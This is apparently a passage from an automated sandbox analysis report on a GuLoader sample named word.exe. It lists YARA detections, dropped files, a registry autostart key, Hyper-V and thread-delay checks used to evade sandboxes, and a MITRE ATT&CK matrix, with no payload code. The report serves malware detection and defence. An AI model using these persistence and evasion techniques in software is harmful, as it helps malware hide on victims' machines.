              Source: C:\Users\user\Desktop\word.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: word.exeStatic PE information: certificate valid
              Source: word.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000000.00000002.1794654590.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1794654590.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.5953667909.00000000016D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1794245028.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\Users\user\spherosome\preadoption\preembodiment\Unending.die, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nsh912A.tmp, type: DROPPED
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_0040601C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040601C
              Source: System.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1014f
              Source: word.exeStatic PE information: real checksum: 0xb3966 should be: 0xb47c4
              Source: Julenissen.exe.21.drStatic PE information: real checksum: 0xb3966 should be: 0xb47c4
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_10002D30 push eax; ret 0_2_10002D5E
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_0015275A pushad ; retf 37DBh21_2_0015277D
              Source: C:\Users\user\Desktop\word.exeFile created: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exeJump to dropped file
              Source: C:\Users\user\Desktop\word.exeFile created: C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dllJump to dropped file

              Boot Survival

              barindex
              Creates an undocumented autostart registry key
              Source: C:\Users\user\Desktop\word.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows RunJump to behavior
              Source: C:\Users\user\Desktop\word.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS\PerformanceJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\word.exeAPI/Special instruction interceptor: Address: 7302C33
              Source: C:\Users\user\Desktop\word.exeAPI/Special instruction interceptor: Address: 58D2C33
              Source: C:\Users\user\Desktop\word.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\word.exeMemory allocated: 37E60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\word.exeMemory allocated: 39E60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\word.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\word.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\word.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\word.exeAPI coverage: 0.2 %
              Source: C:\Users\user\Desktop\word.exe TID: 7396Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\word.exe TID: 7396Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00405FF5 FindFirstFileA,FindClose,0_2_00405FF5
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_004055B1
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00402645 FindFirstFileA,21_2_00402645
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00405FF5 FindFirstFileA,FindClose,21_2_00405FF5
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,21_2_004055B1
              Source: C:\Users\user\Desktop\word.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\word.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: word.exe, 00000015.00000003.1824336160.000000003A0C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus
              Source: word.exe, 00000015.00000003.1824336160.000000003A0C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
              Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q!Hyper-V Hypervisor Root Partition
              Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q*Hyper-V Dynamic Memory Integration Service
              Source: word.exe, 00000015.00000003.1818293472.000000003C7C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
              Source: word.exe, 00000015.00000003.1819484760.000000003C793000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000003.1822603900.000000003C793000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partitiona
              Source: word.exe, 00000015.00000003.1822177141.000000003C91C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %u<WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Process
              Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q$Hyper-V Hypervisor Logical Processor
              Source: word.exe, 00000015.00000003.1821690930.000000003C7F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
              Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q!Hyper-V Virtual Machine Bus Pipes
              Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q)Hyper-V Hypervisor Root Virtual Processor
              Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
              Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
              Source: word.exe, 00000015.00000003.1826101326.000000003A0B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Servicelm
              Source: word.exe, 00000015.00000003.1824336160.000000003A0C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes'
              Source: C:\Users\user\Desktop\word.exeAPI call chain: ExitProcess graph end nodegraph_0-4259
              Source: C:\Users\user\Desktop\word.exeAPI call chain: ExitProcess graph end nodegraph_0-4423
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00401F68 LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryExA,GetProcAddress,FreeLibrary,0_2_00401F68
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_0040601C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040601C
              Source: C:\Users\user\Desktop\word.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\word.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"Jump to behavior
              Source: C:\Users\user\Desktop\word.exeQueries volume information: C:\Users\user\Desktop\word.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\word.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\word.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\word.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00405D13 GetVersion,LdrInitializeThunk,LdrInitializeThunk,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D13
              Source: C:\Users\user\Desktop\word.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API              		1
              Windows Service              		1
              Windows Service              		11
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		21
              Encrypted Channel              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Registry Run Keys / Startup Folder              		11
              Process Injection              		1
              Disable or Modify Tools              		LSASS Memory31
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Clipboard Data              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading              		1
              Registry Run Keys / Startup Folder              		31
              Virtualization/Sandbox Evasion              		Security Account Manager3
              File and Directory Discovery              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading              		11
              Process Injection              		NTDS114
              System Information Discovery              		Distributed Component Object ModelInput Capture14
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.